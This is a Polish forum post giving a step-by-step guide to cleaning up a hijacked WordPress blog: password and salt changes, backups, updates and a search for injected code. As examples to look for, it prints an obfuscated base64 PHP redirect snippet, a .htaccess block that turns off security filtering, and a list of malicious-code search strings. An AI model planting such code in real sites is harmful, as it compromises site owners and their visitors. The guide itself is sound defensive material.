Skocz do zawartości

Zmień kolory
Primary: Sky Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Secondary: Sky Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Pattern: Blank Waves Squares Notes Sharp Wood Rockface Leather Honey Vertical Triangles
Welcome to Uploaduj.com - Forum Zarabianie przez Internet - Zarabianie na Uploadzie / Uploadingu
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. This message will be removed once you have signed in.
Login to Account Create an Account

Nawet 10 PLN za pobranie jednego pliku w Polsce? Sprawdź narzędzia w Lead.Network

Zdjęcie

[Poradnik][WP] "Mój blog został shackowany" - co robić?!


  • Zaloguj się, aby dodać odpowiedź
Brak odpowiedzi do tego tematu

#1
Karczu

Karczu

    Administrator

  • Administrator
  • 5466 postów


Autorem niniejszego poradnika jest Termik, mam zgodę na jego umieszczenie tutaj ;)


Więc zainstalowałeś ostrożnie i poprawnie Wordpressa, wybrałeś sobie fajny szablon, dodałeś kilka ciekawych pluginów i przede wszystkim masz już dużo zawartości na swoim blogu. Krótko mówiąc, włożyłeś masę pracy w tą stronę.

Nagle, któregoś dnia wchodząc na swoją stronę zauważasz, że pojawił się nowe posty, których TY nie dodawałeś albo strona przekierowuje na jakiś inny adres, bądź jest po prostu zasypana reklamami.

Diagnoza: Twój blog prawdopodobnie został przejęty przez inną osobę - uzyskała do niego dostęp w jakiś niedozwolony sposób. Jaki? Spróbujemy dociec.


Kroki jakie musisz podjąć:


1) Zrób kilka głębokich wdechów - nie wszystko stracone
Nie mówię tutaj tego w formie żartu. Często ludzie robią różne rzeczy, czasem naprawdę niebezpieczne dla bloga pod wpływem emocji i zaprzepaszczają szansę odzyskania go. Dlatego uspokój się przez chwilę nim zaczniemy głęboko myśleć co mogło się stać.


2) Przeskanuj swój komputer
Krok ten należy tylko wykonać kiedy mamy Windowsa.

Malware to takie robaki, które powodują właśnie takie szkody jak przejęcie posiadanych stron (a dokładniej, coś jak keylogger). I pamiętaj, że fakt posiadania najnowszego Nortona czy Kasperskiego nie zwalnia Cię z obowiązku zainstalowania innego anty-wirusa i przeskanowanie nim wszystkich dysków. Rynek tych produktów jest bardzo konkurencyjny, i każdy jest najlepszy w jakiejś dziedzinie. Jeden znajdzie robaka, drugi nie. Ogólnie najlepiej jest także uruchomić skanowanie programem Malwarebytes: http://www.malwareby...lwarebytes_pro/

Jednak jeśli naprawdę chcemy wyeliminować ten powód (szczególnie jeśli nie mieliśmy do tego momentu żadnego anty-wirusa!) to warto odznaczyć opcję ukrywania plików w systemie, i w Windowsową szukajkę wpisać "*.exe". Następnie posortować je sobie po rozmiarze - robaki zwykle mają mniej niż 5MB. Oczywiście należy uważać by nie usunąć ważnych systemowych plików. Tutaj jest wytłumaczone bardziej szczegółowo: http://www.securelis...tect?chapter=83 (ang)


3) Skontaktuj się z dostawcą hostingu
Niestety błąd nie musi stać po naszej stronie i czasem nie tylko nasza strona jest zainfekowana - czasem cały serwer dostawcy hostingu. Dotyczy szczególnie to przede wszystkim współdzielonych hostingów (czyli te najtańsze opcje hostingu). Należy jak najszybciej napisać do firmy i normalnie się spytać czy nie odnotowali ostatnio żadnych problemów z serwerem, bądź czy po prostu nie mają żadnych śmieci na serwerze co mogą przechwytywać dane. Szanująca się firma hostingowa powinna nam szczerze odpowiedzieć (wolą nie ryzykować, kiedy trafi im się specjalista, który wbrew ich uspokojeniom może sam to sprawdzić).


4) Pozmieniaj hasła
Zmień hasła na ftp, bazie danych i do panelu hostingu (minimum 8 znaków, litery+cyfry).


5) Zmień klucze autoryzujące
Użytkownicy piszą często, że należy zmienić hasła. Owszem, ale nie tylko. Po tej czynności obcy człowiek dalej zostanie zalogowany na naszym blogu w panelu admina. Ciasteczka sesji będą dalej prawidłowe i nic go nie wywali (jak umie to nawet restart kompa).

Wchodzimy na stronę generująca klucze: https://api.wordpres...t-key/1.1/salt/
Automatycznie pojawi nam się zestaw kluczy. Kopiujemy je i w FTP w pliku wp-config.php podmieniamy z poprzednimi. Ten zabieg spowoduje wymuszenie po stronie WP ponowne logowanie się wszystkich użytkowników (zadziała tylko w kolejności krok 4->krok 5).


6) Zrób kopię zapasową tego co zostało
Jeśli Twoje pliki i baza danych dalej jest na hostingu pobierz jak najszybciej wszystko na swój dysk (pamiętaj by oznaczyć te rzeczy jako "z zainfekowanego WP"). Kopii zapasowych nigdy za mało.


7) Zupdatuj Wordpress'a do najnowszej wersji
Często problemem są poważne luki w samym silniku i po wgraniu świeżej wersji problem może zniknąć.


8) Szukaj źródła problemu

Osoby włamujące się na naszego bloga używają kilku sposobów:
  • najprostszym sposobem jest ukrycie kodu wykonującego niepożądane przez nas czynności w skrypcie PHP. Jeśli pliki na FTP mają chmody (uprawnienia) do zapisywania to hacker mógł je umieścić gdziekolwiek (domyślnie zapis jest tylko dostępny w 4-5 plikach). Zwykle kod jest szyfrowany w base64 bądź komendzie eval.

    Base64 przekierowujący do pewnej strony wygląda np. tak:
    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

    Gdzie taki kod się znajduję? Często w wp-blog-header.php oraz plikach szablonu.

    Czyli wystarczy CTRL+F i szukać w kodzie:
    1. base64
    2. eval
    3. k1b0rg
    4. keymachine.de
    5. Więcej haszujących rzeczy nie znam - musicie pytać się tutaj kogoś innego bądź na forach specjalistycznych.

    Oczywiście należy cały złośliwy kod usunąć (skopiujcie cały plik sobie wcześniej, żeby nie rozwalić bloga).
  • zdarza się, że złośliwy kod jest też umieszczony w pliku .htaccess (znajduję się w głównym katalogu na FTP np. public_html)

    Jeśli nigdy go nie edytowałeś, powinien wyglądać mniej-więcej tak:
    # BEGIN WordPress
    
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    
    # END WordPress

    Czasem możesz mieć też dodatkowo taki kawałek kodu w tym pliku:
    
    SecFilterEngine Off
    SecFilterScanPOST Off
    
    

    Jeśli jest coś dodatkowego (pomijamy działania SEO jak np. wykluczenie niektórych robotów z indeksowania poszczególnych stron) to należy to usunąć.
  • bardziej zaawansowani hackerzy mogą także wrzucać kod PHP w przebraniu obrazka .jpg do naszego katalogu wysłanych obrazków na bloga.

    Takie metody są trudniejsze do wykrycia, ale nie niemożliwe. Wejdź do phpmyadmina swojej bazy danych i postępuj tak jak tutaj:
    http://www.youtube.com/watch?v=Obqa6jDV-WQ&feature=player_embedded


9) Zastanów się nad usunięciem wszystkiego
Najszybsza i najpewniejsza droga do wyczyszczenia WP to po prostu wyczyszczenie plików na FTP, wyczyszczenie całej bazy danych i wgranie backupa (czystego!). Czasem będziesz potrzebował odzyskać kopie danych, więc...


10) Zastanów się nad zrobieniem nowej kopii zapasowej
Prawidłowe wykonanie kroku 9) oznacza to, że wszystkie bity złego kodu zostały usunięte z Wordpressa. Zazwyczaj...


11) Co? Nie masz kopii zapasowej?
Oprócz skarcenia Cię na początku, podaję Ci do wyboru 2 opcje. Możesz zacząć stronę od początku lub ręcznie szukać kolejnych kawałków złośliwego kodu.

Jednak nie oszukujmy się, jest to żmudna praca, a teraz hackerzy działają naprawdę skutecznie i nawet jeśli spędzimy dnie na usuwaniu takiego kodu z różnych plików (bo tak zwykle ten kod się umieszcza, w plikach, które nawet z pozoru nie powinny takiego posiadać). Nawet jeśli jesteś ekspertem, prawdopodobnie nie znajdziesz wszystkich bitów takiego kodu. Bo wystarczy przeoczyć 1 bit i cała praca okazuje się nieskuteczna.

Jeśli naprawdę masz masę zawartości na swojej stronie i jesteś zdeterminowany do odzyskania wszystkiego spowrotem możesz przeczytać ten artykuł o backdoorach: ottopress.com/2009/hacked-wordpress-backdoors/ (ang) i jak je wyszukiwać.

W momencie kiedy to czytasz i masz 'zdrowego' bloga, a dalej nie masz kopii zapasowej - zrób ją teraz!


12) Zamień silnik Wordpressa na świeżą paczkę.
Pobierz paczkę z silnikiem: http://wordpress.org/download i nadpisz ją na FTP.


13) Zamień wszystkie pliki pluginów i szablonów.
Czyli po prostu usuń wszystkie pliki pluginów i szablonów z FTP i wrzuć je na Wordpress'a ponownie.


14) Pozmieniaj hasła raz jeszcze
Po upewnieniu się, że nasz blog został oczyszczony zmień wszystkie hasła jeszcze raz!


15) Zapoznaj się z bezpieczeństwem Wordpress'a
Obszerny artykuł po polsku: http://webhosting.pl...przed.wlamaniem - po przeczytaniu go na 99% nie dasz się następnym razem 'shackować'.


16) "Powęsz" jak doszło do włamania
Czyli po prostu poczytaj logi hostingu i Wordpressa. Możesz użyć programu OSSEC: http://www.ossec.net by było łatwiej.


17) Rób częste kopie zapasowe
Dostałeś prawdopodobnie nauczkę i teraz będziesz robił częste kopie bazy danych (w phpmyadminie import>jako plik .sql, potem po prostu analogicznie tylko opcja eksport) i plików FTP. Następnym razem jeśli coś takiego się wydarzy wszystko co będziesz musiał zrobić to wyczyścić bazę danych, pliki na FTP, wgrać te zapisane na dysku i zmienić klucze autoryzujące.

Proces ten znacznie przyspiesza plugin polecony przez @karol002 BackWPup: http://wordpress.org...lugins/backwpup który robi kopie bazy i plików i wysyła nam np. na Dropboxa. W wersji PRO można robić plany backupów.
  • 0

Interesują Cię płatności mobilne, przykładowo przyjmowanie wpłat za pośrednictwem SMS Premium bądź Direct Billing? Sprawdź ofertę HotPay.pl

 

Masz stronę internetową, bazę mailingową, fanpage na facebooku lub inne źródło dobrego ruchu? Sieć afiliacyjna Lead.Network dostarczy Ci najlepsze Programy partnerskie do zarobienia na Twoim zapleczu!





Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych

Potrzebna Ci naprawdę dobra sieć afiliacyjna do monetyzowania ruchu bądź pozyskiwania klientów? Na Lead.Network znajdziesz tylko najlepsze programy partnerskie z sieci!
A może chciałbyś uruchomić płatności sms premium na swojej stronie internetowej? Do obsługi płatności sms premium rate, jedynym słusznym wyborem jest HotPay.pl!